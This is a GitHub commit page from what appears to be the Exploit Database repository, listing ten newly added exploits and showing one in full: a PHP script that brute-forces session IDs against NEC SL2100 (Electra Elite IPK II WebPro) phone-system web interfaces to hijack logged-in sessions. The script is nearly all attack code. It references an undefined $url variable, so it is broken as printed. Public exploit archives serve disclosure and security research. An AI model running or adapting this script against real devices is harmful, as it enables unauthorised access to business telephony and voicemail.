Skip to content

Commit

Permalink
DB: 2020-05-06
Browse files Browse the repository at this point in the history 
10 changes to exploits/shellcodes

Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path

Saltstack 3000.1 - Remote Code Execution

BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection
Fishing Reservation System 7.5 - 'uid' SQL Injection
Online Scheduling System 1.0 - 'username' SQL Injection
webERP 4.15.1 - Unauthenticated Backup File Access
PhreeBooks ERP 5.2.5 - Remote Command Execution
SimplePHPGal 0.7 - Remote File Inclusion
NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration
  • Loading branch information
Offensive Security committed May 6, 2020
1 parent fd7a524 commit cc95715
Show file tree
Hide file tree
Showing 11 changed files with 906 additions and 8 deletions.
63 changes: 63 additions & 0 deletions exploits/hardware/webapps/48425.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,63 @@
# Title: NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration
# Author: Cold z3ro
# Date: 2020-05-04
# Homepage: https://www.0x30.cc/
# Vendor Homepage: https://www.nec.com
# Version: 01.03.01
# Discription: NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration

<?php
set_time_limit(0);

$host = "192.168.0.14";

$start = 100;
$end = 30000;
$maxproc= 50;
$execute=0;

echo "\n[+] NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration\n\n";
sleep(3);
for ($i = $start; $i <= $end; $i++)
{

$pid = @pcntl_fork();
$execute++;
if ($execute >= $maxproc)
{
while (pcntl_waitpid(0, $status) != -1)
{
$status = pcntl_wexitstatus($status);
$execute =0;
usleep(3000);
}
}
if (!$pid)
{
echo $url . " checking $i\n";
login($url, $i);
flush();
exit;
}
}


function login($url, $key)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url .'/PyxisUaMenu.htm?sessionId='.$key.'&MAINFRM(444,-1,591)#');
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 80);
curl_setopt($ch, CURLOPT_TIMEOUT, 80);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
$content = curl_exec($ch);
curl_close ($ch);
if(preg_match('/Telephone/i', $content) || preg_match('/Mailbox/i', $content))
{
die("\n\n[+][-]".$url."/PyxisUaMenu.htm?sessionId=".$key."&MAINFRM(444,-1,591)# => Found\n\n");

}
}
Loading

0 comments on commit cc95715

Please sign in to comment.